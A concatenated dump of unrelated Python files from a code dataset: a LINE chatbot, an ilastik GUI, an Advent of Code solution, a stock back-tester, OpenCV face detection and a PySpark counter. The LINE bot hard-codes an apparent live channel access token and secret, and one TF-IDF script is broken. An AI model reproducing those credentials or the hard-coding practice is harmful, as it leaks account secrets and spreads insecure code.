Cat can't print binary data\")\r\n \r\n \r\n\r\n","sub_path":"src/modules/cat.py","file_name":"cat.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"45999252","text":"import threading\nfrom queue import Queue\nimport logging\nimport time\n\nfrom asu.utils.config import Config\nfrom asu.utils.database import Database\nfrom asu.utils.worker import Worker\n\n\nclass Boss(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.log = logging.getLogger(__name__)\n self.config = Config()\n self.database = Database(self.config)\n self.build_queue = Queue(1)\n\n def run(self):\n workers = []\n for worker_location in self.config.get(\"worker\", []):\n worker = Worker(worker_location, \"image\", self.build_queue)\n worker.start()\n workers.append(worker)\n\n self.log.info(\"Active workers are %s\", workers)\n\n while True:\n build_job = self.database.get_build_job()\n if build_job:\n self.log.info(\"Found build job %s\", build_job)\n self.build_queue.put(build_job)\n else:\n time.sleep(10)\n","sub_path":"asu/utils/boss.py","file_name":"boss.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533089669","text":"import os\r\nfrom flask import Flask, request, abort\r\n\r\nfrom linebot import (\r\n LineBotApi, WebhookHandler\r\n)\r\nfrom linebot.exceptions import (\r\n InvalidSignatureError\r\n)\r\nfrom linebot.models import *\r\n\r\napp = Flask(__name__)\r\n# Channel Access Token\r\nline_bot_api = LineBotApi('u2w+d2uomuR0PkCtZLd2DRzjjgCs8fhVxOM8dlOrFoaOU4j5lgk9erJajAZvkMVSjirT4yAAU08AqVhhawonSwocR6P2NJkCVTFVl1oFAr1M11sA/2YGsOOSl2vL4bstW4eK9D7RYiwpN6InudEazwdB04t89/1O/w1cDnyilFU=')\r\n# Channel Secret\r\nhandler = WebhookHandler('6b44bac03bc6cb956d318da6a4aecc65')\r\n\r\n# Listen for all POST requests coming to /callback\r\n@app.route(\"/callback\", methods=['POST'])\r\ndef callback():\r\n # get X-Line-Signature header value\r\n signature = request.headers['X-Line-Signature']\r\n # get request body as text\r\n body = request.get_data(as_text=True)\r\n app.logger.info(\"Request body: \" + body)\r\n # handle webhook body\r\n try:\r\n handler.handle(body, signature)\r\n except InvalidSignatureError:\r\n abort(400)\r\n return 'OK'\r\n\r\n# Handle incoming messages \r\n\r\n@handler.add(MessageEvent, message=TextMessage)\r\ndef handle_message(event):\r\n msg = event.message.text.lower()\r\n\r\n if msg == 'hi':\r\n message = TemplateSendMessage(\r\n alt_text='Buttons template',\r\n template=ButtonsTemplate(\r\n thumbnail_image_url='https://i0.wp.com/www.womstation.com/wp-content/uploads/2018/11/%E9%9F%93%E5%9C%8B4.png?w=1280&ssl=1',\r\n title='First little feature',\r\n text='Trying out some minor features',\r\n actions=[\r\n URITemplateAction(\r\n label='Trending YouTube',\r\n uri='https://www.youtube.com/feed/trending'\r\n ),\r\n URITemplateAction(\r\n label='News',\r\n uri='https://news.google.com/?hl=zh-TW&tab=wn1&gl=TW&ceid=TW:zh-Hant'\r\n ),\r\n URITemplateAction(\r\n label='IGIG',\r\n uri='https://www.instagram.com/?hl=zh-tw'\r\n ),\r\n\r\n ]\r\n )\r\n )\r\n line_bot_api.reply_message(event.reply_token, message)\r\n\r\n else:\r\n \tmessage = TextSendMessage(text='Please type hi')\r\n \tline_bot_api.reply_message(event.reply_token, message)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n port = int(os.environ.get('PORT', 5000))\r\n app.run(host='0.0.0.0', 
port=port)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"427543401","text":"# --- Part Two ---\n# It's getting pretty expensive to fly these days - not because of ticket prices, but because of the ridiculous number of bags you need to buy!\n\n# Consider again your shiny gold bag and the rules from the above example:\n\n# faded blue bags contain 0 other bags.\n# dotted black bags contain 0 other bags.\n# vibrant plum bags contain 11 other bags: 5 faded blue bags and 6 dotted black bags.\n# dark olive bags contain 7 other bags: 3 faded blue bags and 4 dotted black bags.\n# So, a single shiny gold bag must contain 1 dark olive bag (and the 7 bags within it) plus 2 vibrant plum bags (and the 11 bags within each of those): 1 + 1*7 + 2 + 2*11 = 32 bags!\n\n# Of course, the actual rules have a small chance of going several levels deeper than this example; be sure to count all of the bags, even if the nesting becomes topologically impractical!\n\n# Here's another example:\n\n# shiny gold bags contain 2 dark red bags.\n# dark red bags contain 2 dark orange bags.\n# dark orange bags contain 2 dark yellow bags.\n# dark yellow bags contain 2 dark green bags.\n# dark green bags contain 2 dark blue bags.\n# dark blue bags contain 2 dark violet bags.\n# dark violet bags contain no other bags.\n# In this example, a single shiny gold bag must contain 126 other bags.\n\n# How many individual bags are required inside your single shiny gold bag?\n\ninputFile = 'day7-input.txt'\nbagColor = 'shiny gold'\nmultiple = 1\n\ndef fileInput():\n f = open(inputFile, 'r')\n with open(inputFile) as f:\n read_data = f.read().split('\\n')\n f.close()\n\n return read_data\n\n# bag: {innerbags[0]:count[0],...,innerBag[x]:count[x]}\n# {dark orange: {'bright white': 3, 'muted yellow': 4}}\n# {bright white: {'shiny gold': 1}}\ndef organizeBags(bags):\n bagRule = {}\n for rule in bags:\n count = 0\n bagKey = ''\n bagVal = {}\n \n rule = rule.split('contain ')\n for bag in rule:\n bag = bag.split(', ')\n for string in bag:\n string = string.replace(' bags','')\n string = string.replace(' bag','')\n string = string.rstrip(' .')\n if string[0].isdigit():\n string = string.split(' ',1)\n bagVal.update({string[1]:int(string[0])})\n if count == 0:\n count = count + 1\n bagKey = string\n\n bagRule.update({bagKey:bagVal})\n return bagRule\n\n\n#{'light red': {'bright white': 1, 'muted yellow': 2}, 'dark orange': {'bright white': 3, 'muted yellow': 4}, 'bright white': {'shiny gold': 1}, 'muted yellow': {'shiny gold': 2, 'faded blue': 9}, 'shiny gold': {'dark olive': 1, 'vibrant plum': 2}, 'dark olive': {'faded blue': 3, 'dotted black': 4}, 'vibrant plum': {'faded blue': 5, 'dotted black': 6}, 'faded blue': {}, 'dotted black': {}} \ndef findBags(bagColor, bags, multiple):\n count = 0\n if not bags.get(bagColor):\n return multiple\n for bag in bags.get(bagColor):\n count = count + multiple * findBags(bag, bags, bags.get(bagColor).get(bag))\n return count + multiple\n\nif __name__ == \"__main__\":\n data = fileInput()\n orgBags = organizeBags(data)\n print(findBags(bagColor,orgBags,multiple)-1)","sub_path":"day7/day7-2.py","file_name":"day7-2.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"53566","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom textblob import Word\nfrom 
textblob import TextBlob \n\n\n\ns1 ='State of Japan is an island country in East Asia.'\ns2 ='Located in the Pacific Ocean, it lies off the eastern coast of the Asian continent and stretches from the Sea of Okhotsk in the north to the East China Sea and the Philippine Sea in the south'\ns3= 'The kanji that make up Japans name mean sun origin, and it is often called the Land of the Rising Sun.'\ns4='The Greater Tokyo Area is the most populous metropolitan area in the world with over 38 million people.'\n\nt1 =TextBlob(s1)\nt2 =TextBlob(s2)\nt3 =TextBlob(s3)\nt4 =TextBlob(s4)\n\ndocument = [t1,t2,t3,t4]\nprint(document)\ndoclist=[]\nfor doc in document:\n WordList = doc.words\n for word in WordList :\n doclist.append(word)\n \ndoclist = WordList(doclist)\nprint(doclist)\n\ntflist=[]\nfor word in doclist:\n tf = doclist.words.count(word)\n tflist.append(tf)\n \nprint(tflist)\n\n'''\n\nfor doc in document:\n WordList = doc.words\n for word in WordList :\n tf = doc.words.count(word)\n tflist.append(tf)\n print('{0} -- {1} '.format(word,str(tf)))\n \nprint('=============================') \n\ndataset =[s1,s2,s3,s4]\n\nprint(dataset)\nprint(tflist)\n\ntfidf = TfidfVectorizer(stop_words='english')\n\ntfidf.fit(dataset)\n#print(tfidf.vocabulary_)\n\ndata = tfidf.vocabulary_\n\n#print(data.keys())\n#print(data.values())\ndatalist =[]\nfor key in data.keys():\n print('{0} {1}'.format(key,data[key]))\n datalist.append(data[key])\n\nprint(datalist)\nfrom sklearn.cluster import KMeans\n\nprint(len(tflist))\nprint(len(datalist))\n\n#x = list(zip(tflist,datalist))\nmodel = KMeans(n_clusters=3)\n\nmodel.fit_transform(tfidf)\nimport matplotlib.pyplot as plt\n\nplt.scatter(tfidf,datalist,c =tflist)\nplt.show()\n\n'''\n","sub_path":"Day7/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"478212537","text":"# Python\nimport os\nfrom functools import partial\nimport logging\nlogger = logging.getLogger(__name__)\n\n# SciPy\nimport numpy\nimport h5py\n\n# PyQt\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QApplication, QAbstractItemView, QFileDialog, QMessageBox, QCursor\nfrom PyQt4 import uic\n\n# lazyflow\nfrom lazyflow.operators.generic import OpSubRegion\n\n# volumina\nfrom volumina.utility import PreferencesManager\n\n# ilastik\nfrom ilastik.widgets.featureTableWidget import FeatureEntry\nfrom ilastik.widgets.featureDlg import FeatureDlg\nfrom ilastik.utility import bind\nfrom volumina.utility import encode_from_qstring\nfrom ilastik.applets.layerViewer.layerViewerGui import LayerViewerGui\nfrom ilastik.config import cfg as ilastik_config\n\nfrom ilastik.applets.base.applet import DatasetConstraintError\n\n#===----------------------------------------------------------------------------------------------------------------===\n#=== FeatureSelectionGui ===\n#===----------------------------------------------------------------------------------------------------------------===\n\nclass FeatureSelectionGui(LayerViewerGui):\n \"\"\"\n \"\"\"\n \n # Constants \n ScalesList = [0.3, 0.7, 1, 1.6, 3.5, 5.0, 10.0]\n\n # Map feature groups to lists of feature IDs\n FeatureGroups = [ ( \"Color/Intensity\", [ \"GaussianSmoothing\" ] ),\n ( \"Edge\", [ \"LaplacianOfGaussian\", \"GaussianGradientMagnitude\", \"DifferenceOfGaussians\" ] ),\n ( \"Texture\", [ \"StructureTensorEigenvalues\", \"HessianOfGaussianEigenvalues\" ] ) ]\n\n # Map feature IDs to feature names\n FeatureNames = { 
'GaussianSmoothing' : 'Gaussian Smoothing',\n 'LaplacianOfGaussian' : \"Laplacian of Gaussian\",\n 'GaussianGradientMagnitude' : \"Gaussian Gradient Magnitude\",\n 'DifferenceOfGaussians' : \"Difference of Gaussians\",\n 'StructureTensorEigenvalues' : \"Structure Tensor Eigenvalues\",\n 'HessianOfGaussianEigenvalues' : \"Hessian of Gaussian Eigenvalues\" }\n\n ###########################################\n ### AppletGuiInterface Concrete Methods ###\n ###########################################\n \n def appletDrawer(self):\n return self.drawer\n\n def viewerControlWidget(self):\n return self._viewerControlWidget\n\n def stopAndCleanUp(self):\n super(FeatureSelectionGui, self).stopAndCleanUp()\n\n # Unsubscribe to all signals\n for fn in self.__cleanup_fns:\n fn()\n\n # (Other methods already provided by our base class)\n\n ###########################################\n ###########################################\n \n def __init__(self, parentApplet, topLevelOperatorView):\n \"\"\"\n \"\"\"\n self.topLevelOperatorView = topLevelOperatorView\n super(FeatureSelectionGui, self).__init__(parentApplet, topLevelOperatorView, crosshair=False)\n self.parentApplet = parentApplet\n \n self.__cleanup_fns = []\n\n self.topLevelOperatorView.SelectionMatrix.notifyDirty( bind(self.onFeaturesSelectionsChanged) )\n self.topLevelOperatorView.FeatureListFilename.notifyDirty( bind(self.onFeaturesSelectionsChanged) )\n self.__cleanup_fns.append( partial( self.topLevelOperatorView.SelectionMatrix.unregisterDirty, bind(self.onFeaturesSelectionsChanged) ) )\n self.__cleanup_fns.append( partial( self.topLevelOperatorView.FeatureListFilename.unregisterDirty, bind(self.onFeaturesSelectionsChanged) ) )\n\n self.onFeaturesSelectionsChanged()\n\n\n # Init feature dialog\n self.initFeatureDlg()\n\n def getFeatureIdOrder(self):\n featureIrdOrder = []\n for group, featureIds in self.FeatureGroups:\n featureIrdOrder += featureIds\n return featureIrdOrder\n\n def initFeatureOrder(self):\n self.topLevelOperatorView.Scales.setValue( self.ScalesList )\n self.topLevelOperatorView.FeatureIds.setValue( self.getFeatureIdOrder() )\n \n def initAppletDrawerUi(self):\n \"\"\"\n Load the ui file for the applet drawer, which we own.\n \"\"\"\n localDir = os.path.split(__file__)[0]\n # (We don't pass self here because we keep the drawer ui in a separate object.)\n self.drawer = uic.loadUi(localDir+\"/featureSelectionDrawer.ui\")\n self.drawer.SelectFeaturesButton.clicked.connect(self.onFeatureButtonClicked)\n self.drawer.UsePrecomputedFeaturesButton.clicked.connect(self.onUsePrecomputedFeaturesButtonClicked)\n dbg = ilastik_config.getboolean(\"ilastik\", \"debug\") \n if not dbg:\n self.drawer.UsePrecomputedFeaturesButton.setHidden(True)\n\n def initViewerControlUi(self):\n \"\"\"\n Load the viewer controls GUI, which appears below the applet bar.\n In our case, the viewer control GUI consists mainly of a layer list.\n \n TODO: Right now we manage adding/removing entries to a plain listview \n widget by monitoring the layerstack for changes.\n Ideally, we should implement a custom widget that does this for us, \n which would be initialized with the layer list model (like volumina.layerwidget)\n \"\"\"\n self._viewerControlWidget = uic.loadUi(os.path.split(__file__)[0] + \"/viewerControls.ui\")\n \n layerListWidget = self._viewerControlWidget.featureListWidget\n layerListWidget.setSelectionMode(QAbstractItemView.SingleSelection)\n\n # Need to handle data changes because the layerstack model hasn't \n # updated his data yet by the time he 
calls the rowsInserted signal\n def handleLayerStackDataChanged(startIndex, stopIndex):\n row = startIndex.row()\n layerListWidget.item(row).setText(self.layerstack[row].name)\n \n def handleSelectionChanged(row):\n # Only one layer is visible at a time\n for i, layer in enumerate(self.layerstack):\n layer.visible = (i == row)\n \n def handleInsertedLayers(parent, start, end):\n for i in range(start, end+1):\n layerListWidget.insertItem(i, self.layerstack[i].name)\n if layerListWidget.model().rowCount() == 1:\n layerListWidget.item(0).setSelected(True)\n\n def handleRemovedLayers(parent, start, end):\n for i in reversed(range(start, end+1)):\n layerListWidget.takeItem(i)\n \n self.layerstack.dataChanged.connect(handleLayerStackDataChanged)\n self.layerstack.rowsRemoved.connect( handleRemovedLayers )\n self.layerstack.rowsInserted.connect( handleInsertedLayers )\n layerListWidget.currentRowChanged.connect( handleSelectionChanged )\n \n def setupLayers(self):\n opFeatureSelection = self.topLevelOperatorView\n inputSlot = opFeatureSelection.InputImage\n \n layers = []\n \n if inputSlot.ready(): \n rawLayer = self.createStandardLayerFromSlot(inputSlot)\n rawLayer.visible = True\n rawLayer.opacity = 1.0\n rawLayer.name = \"Raw Data (display only)\" \n layers.append(rawLayer)\n\n featureMultiSlot = opFeatureSelection.FeatureLayers\n if inputSlot.ready() and featureMultiSlot.ready():\n for featureIndex, featureSlot in enumerate(featureMultiSlot):\n assert featureSlot.ready()\n layers += self.getFeatureLayers(inputSlot, featureSlot)\n \n layers[0].visible = True\n return layers\n\n def getFeatureLayers(self, inputSlot, featureSlot):\n \"\"\"\n Generate a list of layers for the feature image produced by the given slot.\n \"\"\"\n layers = []\n \n channelAxis = inputSlot.meta.axistags.channelIndex\n assert channelAxis == featureSlot.meta.axistags.channelIndex\n numInputChannels = inputSlot.meta.shape[channelAxis]\n numFeatureChannels = featureSlot.meta.shape[channelAxis]\n\n # Determine how many channels this feature has (up to 3)\n featureChannelsPerInputChannel = numFeatureChannels / numInputChannels\n assert 0 < featureChannelsPerInputChannel <= 3, \"The feature selection Gui does not yet support features with more than three channels per input channel.\" \n\n for inputChannel in range(numInputChannels):\n # Determine the name for this feature\n featureName = featureSlot.meta.description\n assert featureName is not None\n if 2 <= numInputChannels <= 3:\n channelNames = ['R', 'G', 'B']\n featureName += \" (\" + channelNames[inputChannel] + \")\"\n if numInputChannels > 3:\n featureName += \" (Ch. 
{})\".format(inputChannel)\n\n opSubRegion = OpSubRegion(parent=self.topLevelOperatorView.parent)\n opSubRegion.Input.connect( featureSlot )\n start = [0] * len(featureSlot.meta.shape)\n start[channelAxis] = inputChannel * featureChannelsPerInputChannel\n stop = list(featureSlot.meta.shape)\n stop[channelAxis] = (inputChannel+1) * featureChannelsPerInputChannel\n opSubRegion.Start.setValue( tuple(start) )\n opSubRegion.Stop.setValue( tuple(stop) )\n \n featureLayer = self.createStandardLayerFromSlot( opSubRegion.Output )\n featureLayer.visible = False\n featureLayer.opacity = 1.0\n featureLayer.name = featureName\n \n layers.append(featureLayer)\n\n return layers\n\n def initFeatureDlg(self):\n \"\"\"\n Initialize the feature selection widget.\n \"\"\"\n self.initFeatureOrder()\n\n self.featureDlg = FeatureDlg(parent = self)\n self.featureDlg.setWindowTitle(\"Features\")\n try:\n size = PreferencesManager().get(\"featureSelection\",\"dialog size\")\n self.featureDlg.resize(*size)\n except TypeError:pass\n \n def saveSize():\n size = self.featureDlg.size()\n s = (size.width(),size.height())\n PreferencesManager().set(\"featureSelection\",\"dialog size\",s)\n self.featureDlg.accepted.connect(saveSize)\n \n # Map from groups of feature IDs to groups of feature NAMEs\n groupedNames = []\n for group, featureIds in self.FeatureGroups:\n featureEntries = []\n for featureId in featureIds:\n featureName = self.FeatureNames[featureId]\n featureEntries.append( FeatureEntry(featureName) )\n groupedNames.append( (group, featureEntries) )\n self.featureDlg.createFeatureTable( groupedNames, self.ScalesList )\n self.featureDlg.setImageToPreView(None)\n\n # Init with no features\n rows = len(self.topLevelOperatorView.FeatureIds.value)\n cols = len(self.topLevelOperatorView.Scales.value)\n defaultFeatures = numpy.zeros((rows,cols), dtype=bool)\n self.featureDlg.selectedFeatureBoolMatrix = defaultFeatures\n\n self.featureDlg.accepted.connect(self.onNewFeaturesFromFeatureDlg)\n\n # Disable the first column, except for the first item.\n # This is a slightly hacky way of fixing ilastik issue #610.\n # Besides color, the features at a sigma of 0.3 are not valid because the \n # results are overwhelmed by the inherent sampling noise of the filter.\n # (This is a bit hacky because we ASSUME the first feature is Gaussian \n # Smoothing. 
It works for now.)\n enabled_item_mask = numpy.ones( defaultFeatures.shape, dtype=bool )\n enabled_item_mask[1:,0] = False # hacky\n self.featureDlg.setEnableItemMask( enabled_item_mask )\n\n def onUsePrecomputedFeaturesButtonClicked(self):\n options = QFileDialog.Options()\n if ilastik_config.getboolean(\"ilastik\", \"debug\"):\n options |= QFileDialog.DontUseNativeDialog\n\n filename = QFileDialog.getOpenFileName(self, 'Open Feature List', '.', options=options)\n filename = encode_from_qstring(filename)\n \n #sanity checks on the given file\n if not filename:\n return\n if not os.path.exists(filename):\n QMessageBox.critical(self, \"Open Feature List\", \"File '%s' does not exist\" % filename)\n return\n f = open(filename, 'r')\n with f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n if not os.path.exists(line):\n QMessageBox.critical(self, \"Open Feature List\", \"File '%s', referenced in '%s', does not exist\" % (line, filename))\n return\n try:\n h = h5py.File(line, 'r')\n with h:\n assert len(h[\"data\"].shape) == 3\n except:\n QMessageBox.critical(self, \"Open Feature List\", \"File '%s', referenced in '%s', could not be opened as an HDF5 file or does not contain a 3D dataset called 'data'\" % (line, filename))\n return\n\n self.topLevelOperatorView.FeatureListFilename.setValue(filename)\n self.topLevelOperatorView._setupOutputs()\n self.onFeaturesSelectionsChanged()\n\n # Notify the workflow that some applets may have changed state now.\n # (For example, the downstream pixel classification applet can \n # be used now that there are features selected)\n self.parentApplet.appletStateUpdateRequested.emit()\n\n def onFeatureButtonClicked(self):\n self.topLevelOperatorView.FeatureListFilename.setValue(\"\")\n \n # Refresh the feature matrix in case it has changed since the last time we were opened\n # (e.g. 
if the user loaded a project from disk)\n if self.topLevelOperatorView.SelectionMatrix.ready() and self.topLevelOperatorView.FeatureIds.ready():\n # Re-order the feature matrix using the loaded feature ids\n matrix = self.topLevelOperatorView.SelectionMatrix.value\n featureOrdering = self.topLevelOperatorView.FeatureIds.value\n \n reorderedMatrix = numpy.zeros(matrix.shape, dtype=bool)\n newrow = 0\n for group, featureIds in self.FeatureGroups:\n for featureId in featureIds:\n oldrow = featureOrdering.index(featureId)\n reorderedMatrix[newrow] = matrix[oldrow]\n newrow += 1\n \n self.featureDlg.selectedFeatureBoolMatrix = reorderedMatrix\n \n # Now open the feature selection dialog\n self.featureDlg.exec_()\n\n def onNewFeaturesFromFeatureDlg(self):\n opFeatureSelection = self.topLevelOperatorView\n if opFeatureSelection is not None:\n # Re-initialize the scales and features\n self.initFeatureOrder()\n\n # Give the new features to the pipeline (if there are any)\n featureMatrix = numpy.asarray(self.featureDlg.selectedFeatureBoolMatrix)\n if featureMatrix.any():\n # Disable gui\n self.parentApplet.busy = True\n self.parentApplet.appletStateUpdateRequested.emit()\n QApplication.instance().setOverrideCursor( QCursor(Qt.WaitCursor) )\n QApplication.instance().processEvents()\n \n try:\n opFeatureSelection.SelectionMatrix.setValue( featureMatrix )\n except DatasetConstraintError as ex:\n # The user selected some scales that were too big.\n QMessageBox.critical(self, \"Invalid selections\", ex.message)\n opFeatureSelection.SelectionMatrix.disconnect()\n \n # Re-enable gui\n QApplication.instance().restoreOverrideCursor()\n self.parentApplet.busy = False\n self.parentApplet.appletStateUpdateRequested.emit()\n else:\n # Not valid to give a matrix with no features selected.\n # Disconnect.\n opFeatureSelection.SelectionMatrix.disconnect()\n\n # Notify the workflow that some applets may have changed state now.\n # (For example, the downstream pixel classification applet can \n # be used now that there are features selected)\n self.parentApplet.appletStateUpdateRequested.emit()\n\n def onFeaturesSelectionsChanged(self):\n \"\"\"\n Handles changes to our top-level operator's matrix of feature selections.\n \"\"\"\n # Update the drawer caption\n \n fff = ( self.topLevelOperatorView.FeatureListFilename.ready() and \\\n len(self.topLevelOperatorView.FeatureListFilename.value) != 0)\n \n if not self.topLevelOperatorView.SelectionMatrix.ready() and not fff: \n self.drawer.caption.setText( \"(No features selected)\" )\n self.layerstack.clear()\n elif fff:\n self.drawer.caption.setText( \"(features from files)\" )\n else:\n self.initFeatureOrder()\n matrix = self.topLevelOperatorView.SelectionMatrix.value\n self.drawer.caption.setText( \"(Selected %d features)\" % numpy.sum(matrix) )\n","sub_path":"ilastik/applets/featureSelection/featureSelectionGui.py","file_name":"featureSelectionGui.py","file_ext":"py","file_size_in_byte":17415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"485745643","text":"# -*- coding: utf-8 -*-\nimport multiprocessing\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\nfrom bdshare import get_current_trading_code\n\nfrom backtraderbd.data.bdshare import DseHisData as bds\nimport backtraderbd.tasks as btasks\nfrom backtraderbd.libs.log import get_logger\nfrom backtraderbd.settings import settings as conf\nfrom backtraderbd.libs import models\n\nlogger = get_logger(__name__)\n\n\ndef 
back_test(Strategy, stock):\n    \"\"\"\n    Run back testing tasks via multiprocessing\n    :return: None\n    \"\"\"\n    task = btasks.Task(Strategy, stock)\n    result = task.task()\n\n    stock_id = result.get('stock_id')\n    trading_days = result.get('trading_days')\n    total_return_rate = result.get('total_return_rate')\n    max_drawdown = result.get('max_drawdown')\n    max_drawdown_period = result.get('max_drawdown_period')\n    logger.debug(\n        f'Stock {stock_id} back testing result, trading days: {trading_days:.2f}, '\n        f'total return rate: {total_return_rate:.2f}, '\n        f'max drawdown: {max_drawdown:.2f}, '\n        f'max drawdown period: {max_drawdown_period:.2f}'\n    )\n\n    drawdown_points = result.get('drawdown_points')\n    logger.debug('Draw down points:')\n    for drawdown_point in drawdown_points:\n        drawdown_point_dt = drawdown_point.get(\"datetime\").isoformat()\n        drawdown = drawdown_point.get('drawdown')\n        drawdownlen = drawdown_point.get('drawdownlen')\n        logger.debug(\n            f'stock: {stock_id}, drawdown_point: {drawdown_point_dt}, '\n            f'drawdown: {drawdown:.2f}, drawdownlen: {drawdownlen}'\n        )\n\n\ndef main(Strategy, stock_pools):\n    \"\"\"\n    Get all stocks and run back test.\n    :param stock_pools: list, the stock code list.\n    :return: None\n    \"\"\"\n    i = 1\n    pool = multiprocessing.Pool()\n    for stock in stock_pools['symbol']:\n        bds.download_one_delta_data(stock)\n        pool.apply_async(back_test, args=(Strategy, stock, ))\n        print('Process No: {0} - Stock Code: {1} :: Done'.format(i, stock))\n        i += 1\n    pool.close()\n    pool.join()\n\n\nif __name__ == '__main__':\n    # create params library if not exist\n    models.get_or_create_library(conf.STRATEGY_PARAMS_LIBNAME)\n\n    bd_stocks = get_current_trading_code()\n    main(\"smac\", bd_stocks)\n","sub_path":"tests/bt_main_initial.py","file_name":"bt_main_initial.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"266213553","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/ipfspinsteem/strings.py\n# Compiled at: 2018-04-27 14:12:24\n# Size of source mod 2**32: 451 bytes\nHash = 'Hash'\nName = 'Name'\nuser = 'user'\npermlink = 'permlink'\ndonotadd = 'donotadd'\nvideo = 'video'\naudio = 'audio'\npepe = 'pepe'\ninfo = 'info'\nobj = 'obj'\nlinks = 'Links'\npermlinks = 'permlinks'\navailable = {'json_metadata': [\n             {'video': [\n                {'content': ['videohash', 'video480hash', 'video720hash', 'video240hash', 'subtitleshash', 'subtitles']},\n                {'info': ['snaphash', 'spritehash']}]},\n             {'audio': [{'files': ['sound', 'cover', 'peaks']}]},\n             {'ipfsHash': []}, {'ipfs_photo': []}]}","sub_path":"pycfiles/ipfs_pin_steem-1.0.7-py36-none-any/strings.cpython-36.py","file_name":"strings.cpython-36.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"398953751","text":"import cv2\r\n\r\nface = cv2.CascadeClassifier('file-xml/face-detect.xml')\r\neye = cv2.CascadeClassifier('file-xml/eye-detect.xml')\r\n\r\nimg = cv2.imread('img/mutia.JPG')\r\n\r\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #cvt = convert\r\nmuka = face.detectMultiScale(gray, 1.3, 5)\r\n\r\nfor (x, y, w, h) in muka: #x and y coordinates, while w & h = the width and height of the face\r\n    #draw a box on the face in image img from coordinate (x, y) to coordinate (x+w, y+h) in green (0,255,0) with a 5px line width\r\n    cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 5)\r\n\r\n    # Region of Image (ROI) for the eyes\r\n    roi_warna = img[y:y+h, x:x+w]\r\n    roi_gray = gray[y:y+h, x:x+w]\r\n    mata = eye.detectMultiScale(roi_gray, 1.3, 3)\r\n\r\n    for (mx, my, mw, mh) in mata:\r\n        cv2.rectangle(roi_warna, (mx, my), (mx + mw, my + mh), (255, 255, 0), 1)\r\n\r\ncv2.imshow('face and eye detection', img)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","sub_path":"image_processing_with_opencv/img_detection&operation/3_face&eye_detect_img.py","file_name":"3_face&eye_detect_img.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"411996091","text":"from __future__ import print_function\n\nimport sys\nfrom operator import add\nfrom pyspark import SparkContext\nfrom csv import reader\n\nif __name__ == \"__main__\":\n\tsc = SparkContext()\n\tdata = sc.textFile(sys.argv[1], 1)\n\theader = data.first() \n\tlines = data.filter(lambda row: row != header) \n\tline = lines.map(lambda x:(x.encode('ascii','ignore')))\\\n\t\t\t\t.mapPartitions(lambda x: (reader(x, delimiter = ',', quotechar = '\"')))\n\n\tdef check_missing_values(content):\n\t\ttry:\n\t\t\tcontents = content.lower()\n\t\texcept AttributeError:\n\t\t\tcontents = content\n\t\t\n\t\tresult = \"NOT NULL\"\n\n\t\tif contents == '':\n\t\t\tresult = \"BLANK\"\n\t\t\n\t\telif (contents == 'n/a' or contents == 'N/A'):\n\t\t\tresult = \"N/A\"\n\t\t\n\t\telif (contents == 'na' or contents == 'NA'):\n\t\t\tresult = \"NA\"\n\t\t\n\t\telif (contents == 'unspecified' or contents == 'Unspecified'):\n\t\t\tresult = \"Unspecified\"\n\n\t\treturn result\n\n\tlocation = line.map(lambda x: (x[52].encode('utf-8')))\\\n\t\t\t\t\t.map(lambda x: (check_missing_values(x), 1))\\\n\t\t\t\t\t.reduceByKey(add)\\\n\t\t\t\t\t.map(lambda x: x[0]+'\\t'+str(x[1]))\\\n\t\t\t\t\t.saveAsTextFile(\"mv_52.out\")\n\n","sub_path":"src/data_issue/test_col.py","file_name":"test_col.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
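# --- Editor's example (not a dataset record). The PySpark job above buckets raw CSV cells
# into missing-value categories and tallies them with reduceByKey. Below is a minimal,
# hedged pure-Python sketch of the same bucketing logic, runnable without a Spark cluster;
# the sample values are invented for illustration.
from collections import Counter

def bucket(value):
    # Mirror check_missing_values(): lower-case strings once, then compare.
    contents = value.lower() if isinstance(value, str) else value
    if contents == '':
        return 'BLANK'
    if contents == 'n/a':
        return 'N/A'
    if contents == 'na':
        return 'NA'
    if contents == 'unspecified':
        return 'Unspecified'
    return 'NOT NULL'

sample = ['BROOKLYN', '', 'N/A', 'na', 'Unspecified', 'Queens']
print(Counter(bucket(v) for v in sample))
# -> Counter({'NOT NULL': 2, 'BLANK': 1, 'N/A': 1, 'NA': 1, 'Unspecified': 1})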
